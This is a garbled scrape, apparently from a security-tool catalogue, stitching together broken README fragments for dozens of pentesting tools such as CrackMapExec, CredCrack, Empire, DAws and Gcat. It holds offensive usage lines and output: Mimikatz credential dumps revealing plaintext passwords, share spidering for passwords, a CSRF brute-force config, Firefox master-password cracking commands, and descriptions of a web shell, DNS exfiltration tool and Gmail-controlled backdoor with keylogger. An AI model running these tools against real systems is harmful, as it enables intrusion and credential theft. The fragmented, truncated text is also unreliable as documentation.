\__\ | _|
\______||__|\__\ |
|_______|/__/ \__\ |
_______| \______|
Swiss army knife for pentesting Windows/
Active Directory environments | @byt3bl33d3r
Powered by Impacket https://
github.com/CoreSecurity/impacket (@agsolino)
Inspired by:
@ShawnDEvans's smbmap https://
github.com/ShawnDEvans/smbmap
@gojhonny's CredCrack https://
github.com/gojhonny/CredCrack
@pentestgeek's smbexec
https://github.com/pentestgeek/smbexec
positional arguments:
target
-t THREADS
to use
-u USERNAME
assumed
-p PASSWORD
Password
-H HASH
NTLM hash
-n NAMESPACE
cimv2)
-d DOMAIN
Domain name
-s SHARE
-P {139,445}
-v
Credential Gathering:
Options for gathering credentials
--sam
systems
--mimikatz
systems
--ntds {ninja,vss,drsuapi}
Dump the NTDS.dit from target DCs
using the specifed method
(drsuapi is the fastest)
Mapping/Enumeration:
Options for Mapping/Enumerating
--shares
List shares
--sessions
--users
Enumerate users
--lusers
--wmi QUERY
Account Bruteforcing:
found
Spidering:
Options for spidering shares
--spider FOLDER
1)
Command Execution:
Options for executing commands
--execm {atexec,wmi,smbexec}
Method to execute the command
(default: smbexec)
-x COMMAND
-X PS_COMMAND
command
Shellcode/EXE/DLL injection:
Options for injecting Shellcode/EXE/DLL's using
PowerShell
--inject {exe,shellcode,dll}
Inject Shellcode, EXE or a DLL
--path PATH
--download PATH
systems
--upload SRC DST
systems
--delete PATH
Examples
The most basic usage: scans the subnet using 100 concurrent
threads:
#~ python crackmapexec.py -t 100 172.16.206.0/24
[+] 172.16.206.132:445 is running Windows 6.1 Build 7601
(name:DRUGCOMPANY-PC) (domain:DRUGCOMPANY-PC)
[+] 172.16.206.133:445 is running Windows 6.3 Build 9600
(name:DRUGOUTCOVE-PC) (domain:DRUGOUTCOVE-PC)
[+] 172.16.206.130:445 is running Windows 10.0 Build
10240 (name:DESKTOP-QDVNP6B) (domain:DESKTOP-QDVNP6B)
Permissions
-----
-----------
ADMIN$
READ, WRITE
IPC$
NO ACCESS
C$
READ, WRITE
Permissions
-----
-----------
Users
READ, WRITE
ADMIN$
READ, WRITE
IPC$
NO ACCESS
C$
READ, WRITE
SHARE
Permissions
-----
-----------
Users
READ, WRITE
ADMIN$
READ, WRITE
IPC$
NO ACCESS
C$
READ, WRITE
Mimikatz.ps1 HTTP/1.1" 200 172.16.206.133 - - [19/Aug/2015 18:57:40] "GET /InvokeMimikatz.ps1 HTTP/1.1" 200 172.16.206.132 - - [19/Aug/2015 18:57:41] "GET /InvokeMimikatz.ps1 HTTP/1.1" 200 172.16.206.133 - - [19/Aug/2015 18:57:45] "POST / HTTP/
1.1" 200 [+] 172.16.206.133 Found plain text creds! Domain:
drugoutcove-pc Username: drugdealer Password: IloveMETH!@
$
[*] 172.16.206.133 Saved POST data to
Mimikatz-172.16.206.133-2015-08-19_18:57:45.log
172.16.206.130 - - [19/Aug/2015 18:57:47] "POST / HTTP/
1.1" 200 [*] 172.16.206.130 Saved POST data to
Mimikatz-172.16.206.130-2015-08-19_18:57:47.log
172.16.206.132 - - [19/Aug/2015 18:57:48] "POST / HTTP/
1.1" 200 [+] 172.16.206.132 Found plain text creds! Domain:
drugcompany-PC Username: drugcompany Password: IloveWEED!
@#
[+] 172.16.206.132 Found plain text creds! Domain:
DRUGCOMPANY-PC Username: drugdealer Password:
D0ntDoDrugsKIDS!@#
[*] 172.16.206.132 Saved POST data to
Mimikatz-172.16.206.132-2015-08-19_18:57:48.log
Lets Spider the C$ share starting from the Users folder for the
pattern password in all files and directories (concurrently):
#~ python crackmapexec.py -t 150 172.16.206.0/24 -u
username -p password --spider Users --depth 10 --pattern
password
Download CrackMapExec
CREDCRACK - FAST AND STEALTHY CREDENTIAL
HARVESTER
remote IP(s)
-l LHOST, --lhost LHOST
Local host IP to launch scans
from.
-t THREADS, --threads THREADS
Number of threads (default: 10)
Required:
-d DOMAIN, --domain DOMAIN
Domain or Workstation
-u USER, --user USER
Domain username
Examples:
./credcrack.py -d acme -u bob -f hosts -es
./credcrack.py -d acme -u bob -f hosts -l 192.168.1.102 t 20
Examples
----------------------------------------------------------------
\\192.168.1.102\ADMIN$
OPEN
\\192.168.1.102\C$
\\192.168.1.103\ADMIN$
OPEN
\\192.168.1.103\C$
CLOSED
\\192.168.1.103\F$
CLOSED
\\192.168.1.100\ADMIN$
CLOSED
\\192.168.1.100\C$
OPEN
\\192.168.1.100\NETLOGON
OPEN
\\192.168.1.100\SYSVOL
Harvesting credentials
./credcrack.py -f hosts -d acme -u bob -l 192.168.1.100
Password:
`. ())oo() .
|\(%()*^^()^\
%| |-%-------|
% \ | %
%
))
\|%________|
DownloadCredCrack
CREDMAP - THE CREDENTIAL MAPPER
-v/--verbose
-u/--username=USER..
-p/--password=PASS..
-e/--email=EMAIL
-l/--load=LOAD_FILE
format USER:PASSWORD
-x/--exclude=EXCLUDE
-o/--only=ONLY
-s/--safe-urls
-i/--ignore-proxy
--proxy=PROXY
"socks5://192.168.1.2:9050")
--list
EXAMPLES
./credmap.py --username janedoe --email janedoe@email.com
./credmap.py -u johndoe -e johndoe@email.com --exclude
"github.com, live.com"
./credmap.py -u johndoe -p abc123 -vvv --only
"linkedin.com, facebook.com"
PREREQUISITES
VIDEO
An error occurred.
Try watching this video on www.youtube.com, or enable JavaScript if it is
disabled in your browser.
Downloadcredmap
CROUTON - CHROMIUM OS UNIVERSAL CHROOT
ENVIRONMENT
add it. You can see the list of available targets by running sh
~/Downloads/crouton -t help.
Once you've set up your chroot, you can easily enter it using
the newly-installed enter-chroot command, or one of the
target-specific start* commands. Ta-da! That was easy.
Read more here.
DownloadCrouton
CROWBAR - BRUTE FORCING TOOL FOR PENTESTS
Installation
DownloadCrowbar
First, clone it :
$ git clone git@github.com:PaulSec/CSRFT.git
To make this project work, get the latest Node.js version here .
Go in the directory and install all the dependencies:
npm install
More information
The idea is to provide a 'basic' hierarchy (of the folders) for your
projects. I made the script quite modular so your configuration
files/malicious forms, etc. don't have to be in those folders
though. This is more like a good practice/advice for your future
projects.
However, here is a little summary of those folders :
conf folder : add your JSON configuration file with your
configuration.
your forms
attacks
lib : libs specific for my project (custom ones)
utils : folder containing utils such as : csrft_utils.py
which will launch CSRFT directly.
server.js file - the HTTP server
{
"audit": {
"name": "PoC done with Automatic Tool",
"scenario": [
{
"attack": [
{
"file": "./dicos/passwords.txt",
"method": "GET",
"type_attack": "dico",
"url": "http://www.vulnerable.com/
changePassword.php?newPassword=<%value%>"
}
]
}
]
}
}
]
}
]
}
}
}
}
You can now define some "steps", different attacks that will be
executed in a certain order.
Use cases
Download CSRFT
CUPP - COMMON USER PASSWORDS PROFILER
this menu
-i
profiling
-w
dictionary,
or WyD.pl output to make some pwnsauce :)
-l
-a
Configuration
DownloadCupp
CUSTOM-SSH-BACKDOOR - SSH BACKDOOR USING
PARAMIKO
DownloadCustom-SSH-Backdoor
DAMN VULNERABLE WEB APP - PHP/MYSQL TRAINING
There's multiple things that makes DAws better than every Web
Shell out there:
1. Bypasses Disablers; DAws isn't just about using a
particular function to get the job done, it uses up to 6
functions if needed, for example, if shell_exec was
disabled it would automatically use exec or passthru or
system or popen or proc_open instead, same for
2.
3.
4.
5.
6.
7.
Extra Info
Eval Form:
`include` is being used instead PHP `eval` to bypass
Protection Systems.
Download from Link - Methods:
PHP Curl
File_put_content
Zip - Methods:
Linux:
Zip
Windows:
Vbs Script
Shells and Tools:
Extra:
`nohup`, if installed, is automatically used for
background processing.
DownloadDAws
DHARMA - A GENERATION-BASED, CONTEXT-FREE
GRAMMAR FUZZER
None
Examples
Grammar Cheetsheet
Comment
%%% comment
Controls
%const% name := value
Sections
%section% := value
%section% := variable
%section% := variance
Extension methods
%range%(0-9)
%range%(0.0-9.0)
%range%(a-z)
%range%(!-~)
%range%(0x100-0x200)
%repeat%(+variable+)
%repeat%(+variable+, ", ")
%uri%(path)
%uri%(lookup_key)
%block%(path)
%choice%(foo, "bar", 1)
Assigning values
digit :=
%range%(0-9)
sign :=
+
value :=
+sign+%repeat%(+digit+)
Using values
+value+
Assigning variables
variable :=
@variable@ = new Foo();
Using variables
value :=
!variable!.bar();
DownloadDharma
DIRS3ARCH V0.3.0 - HTTP(S) DIRECTORY/FILE BRUTE
FORCER
Windows XP/7/8
GNU/Linux
MacOSX
Features
Multithreaded
Keep alive connections
Support for multiple extensions (-e|--extensions asp,php)
Reporting (plain text, JSON)
Detect not found web pages when 404 not found errors
are masked (.htaccess, web.config, etc).
Recursive brute forcing
HTTP(S) proxy support
Batch processing (-L)
Examples
Scan recursively:
python3 dirs3arch.py -u http://www.example.com/admin/
-e php -r
192.168.1.1
Batch processing:
python3 dirs3arch.py -L urllist.txt -e php
Thirdparty code
colorama
oset
urllib3
sqlmap
Changelog
DownloadDirs3arch
DISCOVER - CUSTOM BASH SCRIPTS USED TO
AUTOMATE VARIOUS PENTESTING TASKS
For use with Kali Linux. Custom bash scripts used to automate
various pentesting tasks.
Download, setup & usage
cd /opt/discover/
./setup.sh
./discover.sh
RECON
1.
Domain
2.
Person
3.
Parse salesforce
SCANNING
4.
5.
CIDR
6.
List
7.
IP or domain
WEB
8.
9.
Nikto
10. SSL
MISC
11. Crack WiFi
12. Parse XML
13. Start a Metasploit listener
14. Update
15. Exit
RECON
Domain
RECON
1.
Passive
2.
Active
3.
Previous menu
Person
RECON
First name:
Last name:
Parse salesforce
Create a free account at salesforce (https://
connect.data.com/login).
Perform a search on your target company > select the
company name > see all.
Copy the results into a new file.
Enter the location of your list:
SCANNING
2.
NetBIOS
3.
netdiscover
4.
Ping sweep
5.
Previous menu
External
2.
Internal
3.
Previous menu
External scan will set the nmap source port to 53 and the
max-rrt-timeout to 1500ms.
Internal scan will set the nmap source port to 88 and the
max-rrt-timeout to 500ms.
Nmap is used to perform host discovery, port scanning,
service enumeration and OS identification.
Matching nmap scripts are used for additional
enumeration.
Matching Metasploit auxiliary modules are also leveraged.
WEB
Open multiple tabs in Icewease
Open multiple tabs in Iceweasel with:
1.
List
2.
3.
Previous menu
Nikto
List of IPs.
2.
List of IP:port.
3.
Previous menu
SSL
Check for SSL certificate issues.
Enter the location of your list:
MISC
Crack WiFi
Crack wireless networks.
Parse XML
Parse XML to CSV.
1.
Burp (Base64)
2.
Nessus
3.
Nexpose
4.
Nmap
5.
Qualys
6.
Previous menu
Download Discover
DNSTEAL - DNS EXFILTRATION TOOL FOR STEALTHILY
SENDING FILES OVER DNS REQUESTS
This is a fake DNS server that allows you to stealthily extract
files from a victim machine through DNS requests.
Below is an image showing an example of how to use:
DownloadDNSteal
DOMI-OWNED - TOOL USED FOR COMPROMISING IBM/
LOTUS DOMINO SERVERS
USAGE
A valid username and password is not required unless
'names.nsf' and/or 'webadmin.nsf' requires authentication.
FINGERPRINTING
authentication.
If a username and password is given, Domi-Owned will check
to see if that account can access 'names.nsf' and
'webadmin.nsf' with those credentials.
REVERSE BRUTEFORCE
, a password with
-p
, and the
--bruteforce
flag. This prints the results to the screen and writes them to
separate out files depending on the hash type (Domino 5,
Domino 6, Domino 8).
QUICK CONSOLE
to quit the Quick Console interpreter, which will also delete the
'log.txt' output file.
EXAMPLES
FINGERPRINT DOMINO SERVER
DownloadDomi-Owned
DOUBLE THE BANG FOR YOUR BUCK WITH ACUNETIX
VULNERABILITY SCANNER
Joomla.
https://www.example.org/sites/all/modules/
pathauto/LICENSE.txt
https://www.example.org/sites/all/modules/
pathauto/API.txt
libraries https://www.example.org/sites/all/modules/
libraries/
https://www.example.org/sites/all/modules/
libraries/CHANGELOG.txt
https://www.example.org/sites/all/modules/
libraries/README.txt
https://www.example.org/sites/all/modules/
libraries/LICENSE.txt
entity https://www.example.org/sites/all/modules/
entity/
https://www.example.org/sites/all/modules/entity/
README.txt
https://www.example.org/sites/all/modules/entity/
LICENSE.txt
google_analytics https://www.example.org/sites/all/
modules/google_analytics/
https://www.example.org/sites/all/modules/
google_analytics/README.txt
https://www.example.org/sites/all/modules/
google_analytics/LICENSE.txt
ctools https://www.example.org/sites/all/modules/
ctools/
https://www.example.org/sites/all/modules/ctools/
CHANGELOG.txt
https://www.example.org/sites/all/modules/ctools/
LICENSE.txt
https://www.example.org/sites/all/modules/ctools/
API.txt
features https://www.example.org/sites/all/modules/
features/
https://www.example.org/sites/all/modules/
features/CHANGELOG.txt
https://www.example.org/sites/all/modules/
features/README.txt
https://www.example.org/sites/all/modules/
features/LICENSE.txt
https://www.example.org/sites/all/modules/
features/API.txt
[... snip for README ...]
[+] Scan finished (0:04:59.502427 elapsed)
Why not X?
Because droopescan:
is fast
is stable
is up to date
allows simultaneous scanning of multiple sites
is 100% python
Installation
Scan types.
Droopescan aims to be the most accurate by default, while not
overloading the target server due to excessive concurrent
requests. Due to this, by default, a large number of requests
will be made with four threads; change these settings by using
the --number and --threads arguments respectively.
This tool is able to perform four kinds of tests. By default all
tests are ran, but you can specify one of the following with the e or --enumerate flag:
p -- Plugin checks: Performs several thousand HTTP
requests and returns a listing of all plugins found to be
installed in the target host.
t -- Theme checks: As above, but for themes.
v -- Version checks: Downloads several files and, based
on the checksums of these files, returns a list of all
possible versions.
i -- Interesting url checks: Checks for interesting urls
(admin panels, readme files, etc.)
More notes regarding scanning can be found here.
Target specification
You can also omit the drupal argument. This will trigger CMS
identification, like so:
droopescan scan -u example.org
example.org
"is_empty": false,
"finds": [
{
"url": "https:\/\/www.drupal.org\/sites\/all\/
modules\/views\/",
"name": "views"
},
[...snip...]
]
}
}
Download Droopescan
DSHELL - NETWORK FORENSIC ANALYSIS FRAMEWORK
Prerequisites
Installation
python-
decode -h
decode -d <decoder>
Usage Examples
192.168.170.8:32795 ->
66-192-9-104.gen.twtelecom.net **
dns 2005-03-30 03:47:46
192.168.170.20:53
192.168.170.8:32795 ->
** 30144 A? www.netbsd.org / A:
192.168.170.8:32795 ->
192.168.170.8:32795 ->
192.168.170.8:32795 ->
CNAME: www.l.google.com **
dns 2005-03-30 03:47:46
192.168.170.20:53
192.168.170.8:32795 ->
NXDOMAIN **
dns 2005-03-30 03:52:17
192.168.170.20:53
192.168.170.8:32796 <-
localhost **
dns 2005-03-30 03:52:25
217.13.4.24:53
192.168.170.56:1711
<-
** 30307 A? GRIMM.utelsystems.local /
NXDOMAIN **
dns 2005-03-30 03:52:17
217.13.4.24:53
192.168.170.56:1710
<-
** 53344 A? GRIMM.utelsystems.local /
NXDOMAIN **
<title>Index of /</title>
</head>
<body>
<h1>Index of /</h1>
<pre><img src="/icons/blank.gif" alt="Icon "> <a href="?
C=N;O=D">Name</a>
<a href="?
C=M;O=A">Last modified</a>
a>
<a href="?C=S;O=A">Size</
06-Jul-2007
]"> <a
href="Efficient_Video_on_demand_over_Multicast.pdf">Effic
ient_Video_on_d..></a> 19-Dec-2006 03:17
<img src="/icons/unknown.gif" alt="[
291K
]"> <a
href="Welcome%20Stranger!!!">Welcome Stranger!!!</a>
28-Dec-2006 03:46
31-
44K
30-Dec-2006 08:59
28-Jun-2007 00:04
]"> <a
href="cisco_ccna_640-801_command_reference_guide.pdf">cis
co_ccna_640-801_c..></a> 28-Dec-2006 03:48
<img src="/icons/folder.gif" alt="[DIR]"> <a
236K
href="doc/">doc/</a>
19-Sep-2006 01:43
06-
03-Jul-2007
04-
31K
36K
]"> <a
href="pruef.pdf">pruef.pdf</a>
07:48
28-Dec-2006
88K
<hr></pre>
</body></html>
36
192.168.1.2 ->
UDP
60583
33436
0.0000s
2006-08-25 19:32:20.766761
192.168.1.2 ->
202.232.205.123
0
36
UDP
36
36
UDP
60583
33435
0.0000s
192.168.1.2 ->
2006-08-25 19:32:20.747503
202.232.205.123
33438
0.0000s
2006-08-25 19:32:20.634046
202.232.205.123
60583
192.168.1.2 ->
UDP
60583
33437
0.0000s
24
131.151.20.254 ->
UDP
201
24
24
150
24
138
138
131.151.1.254 ->
UDP
520
520
131.151.5.254 ->
UDP
520
520
131.151.104.96 ->
UDP
137
137
1.5020s
1999-11-05 18:20:43.087010
255.255.255.255
UDP
0.0000s
1999-11-05 18:20:41.521798
131.151.107.255
131.151.32.71 ->
0.0000s
1999-11-05 18:20:43.079765
255.255.255.255
0.0000s
1999-11-05 18:20:43.096540
255.255.255.255
520
0.0000s
1999-11-05 18:20:42.063074
131.151.32.255
520
131.151.6.254 ->
UDP
520
520
0.0000s
1999-11-05 18:20:43.368210
131.151.111.254 ->
255.255.255.255
0
24
UDP
24
UDP
24
520
UDP
520
520
131.151.115.254 ->
255.255.255.255
UDP
24
520
520
131.151.107.254 ->
255.255.255.255
UDP
24
201
201
UDP
138
138
0.0000s
520
131.151.5.55 ->
1999-11-05 18:20:43.183825
131.151.32.255
520
0.0000s
1999-11-05 18:20:40.112031
131.151.5.255
0.0000s
1999-11-05 18:20:43.363348
0
0.0000s
1999-11-05 18:20:43.375145
0
131.151.10.254 ->
520
0.0000s
1999-11-05 18:20:43.115330
255.255.255.255
131.151.32.254 ->
520
0.0000s
1999-11-05 18:20:43.250410
255.255.255.255
520
131.151.32.79 ->
UDP
138
138
0.0000s
Download Dshell
EGRESS-ASSESS - TOOL USED TO TEST EGRESS DATA
DETECTION CAPABILITIES
Usage
Now, to have the client connect and send data to the ftp server,
you could run...
./Egress-Assess.py --client ftp --username testuser -password pass123 --ip 192.168.63.149 --datatype ssn
DownloadEgress-Assess
EMPIRE - POWERSHELL POST-EXPLOITATION AGENT
Once you hit the main menu, youll see the number of active
agents, listeners, and loaded modules.
The help command should work for all menus, and almost
everything that can be tab-completable is (menu commands,
agent names, local file paths where relevant, etc.).
You can ctrl+C to rage quit at any point. Starting Empire back
up should preserve existing communicating agents, and any
existing listeners will be restarted (as their config is stored in
the sqlite backend database).
Listeners 101
can also use domain names here). The port will automatically
be pulled out, and the backend will detect if youre doing a
HTTP or HTTPS listener. For HTTPS listeners, you must first
set the CertPath to be a local .pem file. The provided ./data/
cert.sh script will generate a self-signed cert and place it in ./
data/empire.pem.
Set optional and WorkingHours, KillDate, DefaultDelay, and
DefaultJitter for the listener, as well as whatever name you
want it to be referred to as. You can then type execute to start
the listener. If the name is already taken, a nameX variant will
be used, and Empire will alert you if the port is already in use.
Stagers 101
DownloadEmpire
EVIL FOCA - MITM, DOS, DNS HIJACKING IN IPV4 AND
IPV6 PENETRATION TESTING TOOL
Windows XP or later.
.NET Framework 4 or later.
Winpcap library (http://www.winpcap.org)
DownloadEvil FOCA
EXPLOIT PACK - OPEN SOURCE SECURITY PROJECT
FOR PENETRATION TESTING AND EXPLOIT
DEVELOPMENT
An error occurred.
Try watching this video on www.youtube.com, or enable JavaScript if it is
disabled in your browser.
Database
* Added Pippingtom, SSHdefaultscan and pasteAnalyzer
plugins
Fixes:
* Debian install
* Saving objects without parent
* Visual fixes on Firefox
DownloadFaraday 1.0.15
FARADAY 1.0.16 - COLLABORATIVE PENETRATION TEST
AND VULNERABILITY MANAGEMENT PLATFORM
ever!
This release also features several new features developed
entirely by our community.
Changes:
/bin/getAllIpsNotServices.py
- get all IP addresses that have defined open port (/bin/
getAllbySrv.py) and get all IPs from targets without services (/
bin/delAllVulnsWith.py)
It's important to note that both these scripts hold a
variable that you can modify to alter its behaviour. /bin/
getAllbySrv.py has a port variable set to 8080 by default. /bin/
delAllVulnsWith.py does the same with a RegExp
* Added three Plugins:
- Immunity Canvas
Canvas configuration
- Dig
- Traceroute
* Refactor Plugin Base to update active WS name in var
* Refactor Plugins to use current WS in temp filename under
$HOME/.faraday/data. Affected Plugins:
- amap
- dnsmap
- nmap
- sslcheck
- wcscan
- webfuzzer
- nikto
Bug fixes:
* When the last workspace was null Faraday wouldn't start
* CSV export/import in QT
* Fixed bug that prevented the use of "reports" and "cwe"
strings in Workspace names
* Unicode support in Nexpose-full Plugin
* Fixed bug get_installed_distributions from handler exceptions
* Fixed bug in first run of Faraday with log path and API errors
DownloadFaraday1.0.16
FARADAY V1.0.7 - INTEGRATED PENETRATION-TEST
ENVIRONMENT A MULTIUSER PENETRATION TEST IDE
DownloadFaraday
FASTNETMON - VERY FAST DDOS ANALYZER WITH
SFLOW/NETFLOW/MIRROR SUPPORT
Supported platforms:
DownloadFastNetMon
FING - FIND OUT WHICH DEVICES ARE CONNECTED TO
YOUR WI-FI NETWORK
seconds.
Wake On LAN: Switch on your devices from your mobile
or tablet!
Ping and traceroute: Understand your network
performances.
Automatic DNS lookup and reverse lookup
Checks the availability of Internet connection
Works also with hosts outside your local network
Tracks when a device has gone online or offline
Launch Apps for specific ports, such as Browser, SSH,
FTP
Displays NetBIOS names and properties
Displays Bonjour info and properties
Supports identification by IP address for bridged networks
Sort by IP, MAC, Name, Vendor, State, Last Change.
Free of charge, no banner Ads
Available for iPhone, iPad and iPod Touch with retina and
standard displays.
Integrates with Fingbox to sync and backup your
customizations, merge networks with multiple access
points, monitor remote networks via Fingbox Sentinels,
get notifications of changes, and much more.
Fing is available on several other platforms, including
Windows, OS X and Linux. Check them out!
DownloadFing
FIREFOX AUTOCOMPLETE SPY - TOOL TO VIEW OR
DELETE AUTOFILL DATA FROM MOZILLA FIREFOX
Field Name
Value
Total Used Count
First Used Date
Last Used Date
How to Use
you to recover the master password and get back all the signon information.
Internals of FireMaster
[-d -f ]
[-h -f
-n
-g "charlist" [ -s | -p ] ]
[-b -m
-l
-c "charlist" -p "pattern" ]
-f
passwords.
Hybrid crack can find passwords like pass123, 123pass etc
-f
-g
strings
-n
word(pass123)
-p
word(123pass)
Brute Force Crack Options:
-b
-c
process
-m
-l
-p
Examples of FireMaster
// Dictionary Crack
FireMaster.exe -d -f c:\dictfile.txt auto
// Hybrid Crack
FireMaster.exe -h -f c:\dictfile.txt -n 3 -g "123" -s
auto
// Brute-force Crack
FireMaster.exe -q -b -m 3 -l 10 -c "abcdetps123" "c:\my
test\firefox"
// Brute-force Crack with Pattern
FireMaster.exe -q -b -m 3 -c "abyz126" -l 10 -p "pa??f??
123" auto
Download FireMaster
FIREMASTERCRACKER - FIREFOX MASTER PASSWORD
CRACKING SOFTWARE
DownloadFireMasterCracker
FIREPASSWORD - FIREFOX USERNAME & PASSWORD
RECOVERY TOOL
DownloadFirePassword
FLASHLIGHT - AUTOMATED INFORMATION GATHERING
TOOL FOR PENETRATION TESTERS
VIDEOS :
https://www.youtube.com/watch?
v=EUMKffaAxzs&list=PL1BVM6VWlmWZOv9Hv8TV2vkAlUmvA5g7&index=4 https://www.youtube.com/watch?
v=qCgW-SfYl1c&list=PL1BVM6VWlmWZOv9Hv8TV2vkAlUmvA5g7&index=5 https://www.youtube.com/watch?
v=98Soe01swR8&list=PL1BVM6VWlmWZOv9Hv8TV2vkAlUmvA5g7&index=6 https://www.youtube.com/watch?
v=9wft9zuh1f0&list=PL1BVM6VWlmWZOv9Hv8TV2vkAlUmvA5g7&index=7
INSTALLATION
apt-get install nmap tshark tcpdump dsniff
1) PASSIVE SCAN
In passive scan, no packets are sent into wire. This type of
scan is used for listening network and analyzing packets.
To launch a passive scan by using Flashlight; a project name
should be specified like passive-pro-01. In the following
command, packets that are captured by eth0 are saved into /
root/Desktop/flashlight/output/passive-project-01/pcap"
directory, whereas, Pcap files and all logs are saved into "/root/
Desktop/log" directory.
./flashlight.py -s passive -p passive-pro-01 -i eth0 -o /
root/Desktop/flashlight_test -l /root/Desktop/log v
2) ACTIVE SCAN
During an active scan, NMAP scripts are used by reading the
configuration file. An example configuration file (flashlight.yaml)
is stored in config directory under the working directory.
tcp_ports:
- 21, 22, 23, 25, 80, 443, 445, 3128, 8080
udp_ports:
- 53, 161
scripts:
- http-enum
3) SCREEN SCAN
Screen Scan is used to get screenshots of web sites/
applications by using directives in config file (flashlight.yaml).
Directives in this file provide screen scan for four ports ("80,
443, 8080, 8443") screen_ports: - 80, 443, 8080, 8443 Sample
screen scan can be performed like this: ``` ./flashlight.py -p
project -s screen -d 192.168.74.0/24 -r /usr/local/rasterize.js -t
10 -v ```
4) FILTERING
Filtering option is used to analyse pcap files. An example for
this option is shown below: ``` ./flashlight.py -p filter-project -s
filter -f /root/Desktop/flashlight/output/passive-project-02/pcap/
20150815072543.pcap -v ``` By running this command some
files are created on filter sub-folder. This option analyzes
PCAP packets according to below properties:
Windows hosts
Top 10 DNS requests
...
DownloadFlashlight
FORPIX - SOFTWARE FOR DETECTING AFFINE IMAGE
FILES
Download Forpix
FRUITYWIFI V2.2 - WIRELESS NETWORK AUDITING TOOL
- Ethernet
Ethernet,
- Ethernet
3G/4G,
- Ethernet
Wifi,
- Wifi
Wifi,
- Wifi
3G/4G, etc.
Within the new options on the control panel we can change the
AP mode between Hostapd or Airmon-ng allowing to use more
chipsets like Realtek.
It is possible customize each one of the network interfaces
which allows the user to keep the current setup or change it
completely.
Changelog
v2.2
v2.1
DownloadFruityWifi
FTPMAP - FTP SCANNER IN C
COMPILATION
./configure
make
make install
Don't trust this. Script kiddies are just ignoring banners. If they
read that "XYZ FTP software has a vulnerability", they will try
the exploit on all FTP servers they will find, whatever software
they are running. The same thing goes for free and commercial
vulnerability scanners. They are probing exploits to find
potential holes, and they just discard banners and messages.
On the other hand, removing software name and version is
confusing for the system administrator, who has no way to
quickly check what's installed on his servers.
If you want to sleep quietly, the best thing to do is to keep your
systems up to date : subscribe to mailing lists and apply vendor
patches.
Downloading Ftpmap
git clone git://github.com/Hypsurus/ftpmap
DownloadFTPMap
GCAT - A STEALTHY BACKDOOR THAT USES GMAIL AS
A COMMAND AND CONTROL SERVER
Usage
Gcat
optional arguments:
-h, --help
-v, --version
exit
-id ID
Client to target
-jobid JOBID
Job id to retrieve
-list
-info
Commands:
Commands to execute on an implant
-cmd CMD
-download PATH
system
-exec-shellcode FILE
client
-screenshot
Take a screenshot
-lock-screen
-force-checkin
Force a check in
-start-keylogger
Start keylogger
-stop-keylogger
Stop keylogger
x86
90b2cd83-cb36-52de-84ee-99db6ff41a11 Windows-XP-5.1.2600SP3-x86
Windows IP Configuration
Host Name . . . . . . . . . . . . :
unknown-2d44b52
Primary Dns Suffix
. . . . . . . :
-- SNIP --
That's the gist of it! But you can do much more as you can
see from the usage of the script! ;)
Download Gcat
GEOTWEET - SOCIAL ENGINEERING TOOL FOR HUMAN
HACKING
Allows you to search on tags, world zones and user (info and
timeline).
Requirements
Python 2.7
PyQt4, tweepy, geopy, ca_certs_locater, pythoninstagram
Works on Linux, Windows, Mac OSX, BSD
Installation
git clone https://github.com/Pinperepette/
Geotweet_GUI.git
cd Geotweet_GUI
chmode +x Geotweet.py
sudo apt-get install python-pip
sudo pip install tweepy
sudo pip install geopy
sudo pip install ca_certs_locater
sudo pip install python-instagram
python ./Geotweet.py
Video
An error occurred.
Try watching this video on www.youtube.com, or enable JavaScript if it is
disabled in your browser.
Download Geotweet
GETHEAD - HTTP HEADER ANALYSIS VULNERABILITY
TOOL
Changelog
Features in Development
DownloadGetHead
GHIRO 0.2 - AUTOMATED DIGITAL IMAGE FORENSICS
TOOL
An error occurred.
Try watching this video on www.youtube.com, or enable JavaScript if it is
disabled in your browser.
MAIN FEATURES
Metadata extraction
Metadata are divided in several categories depending on the
standard they come from. Image metadata are extracted and
categorized. For example: EXIF, IPTC, XMP.
GPS Localization
Embedded in the image metadata sometimes there is a geotag,
hash. You can provide a list of hashes and all images matching
are reported.
DownloadGhiro
GITROB - RECONNAISSANCE TOOL FOR GITHUB
ORGANIZATIONS
DownloadGitrob
GOACCESS - REAL-TIME WEB LOG ANALYZER AND
INTERACTIVE VIEWER
GoAccess parses the specified web log file and outputs the
data to the X terminal.
General statistics, bandwidth, etc.
Time taken to serve the request (useful to track pages that
are slowing down your site)
Top visitors
Requested files & static files
404 or Not Found
Download GoAccess
GPING - PING, BUT WITH A GRAPH
visualize the data. I still wanted to just use the command line
though, so I decided to try and write a cross platform one that I
could use. And here we are.
Code
For a quick hack the code started off really nice, but after I
decided pretty colors were a good addition it quickly got rather
complicated. Inside pinger.py is a function plot() , this uses a
canvas-like object to "draw" things like lines and boxes to the
screen. I found on Windows that changing the colors is slow
and caused the screen to flicker, so theres a big mess of a
function called process_colors to try and optimize that. Don't
ask.
Download Gping
GRAUDIT - FIND POTENTIAL SECURITY FLAWS IN
SOURCE CODE USING GREP
Perl
PHP
Python
Other (looks for suspicious comments, etc)
USAGE
DEPENDENCIES
-d
database to use
Download Graudit
GRINDER - SYSTEM TO AUTOMATE THE FUZZING OF
WEB BROWSERS
DownloadGrinder
GRYFFIN - LARGE SCALE WEB SECURITY SCANNING
PLATFORM
Coverage
Coverage has two dimensions - one during crawl and the other
during fuzzing. In crawl phase, coverage implies being able to
find as much of the application footprint. In scan phase, or while
fuzzing, it implies being able to test each part of the application
for an applied set of vulnerabilities in a deep.
Crawl Coverage
Today a large number of web applications are template-driven,
meaning the same code or path generates millions of URLs.
For a security scanner, it just needs one of the millions of URLs
generated by the same code or path. Gryffin's crawler does just
that.
Page Deduplication
At the heart of Gryffin is a deduplication engine that compares
a new page with already seen pages. If the HTML structure of
the new page is similar to those already seen, it is classified as
a duplicate and not crawled further.
Scale
While Gryffin is available as a standalone package, it's primarily
built for scale.
Gryffin is built on the publisher-subscriber model. Each
component is either a publisher, or a subscriber, or both. This
allows Gryffin to scale horizontally by simply adding more
subscriber or publisher nodes.
Operating Gryffin
Pre-requisites
1. Go
2. PhantomJS, v2
3. Sqlmap (for fuzzing SQLi)
Run
TODO
1.
2.
3.
4.
5.
6.
7.
DownloadGryffin
HEARTBLEED VULNERABILITY SCANNER - NETWORK
SCANNER FOR OPENSSL MEMORY LEAK
(CVE-2014-0160)
Sample usage
Dependencies
| |
(_)
| |
| |
| |
| |__
| '_ \| |/ _` |/ _` |/ _ \ '_ \
| | | | | (_| | (_| |
| |_ ___
| __/ _ \/ _` | '__|
__/ | | | | ||
__ _ _ __
__/ (_| | |
\__\___|\__,_|_|
Demonstration Video
An error occurred.
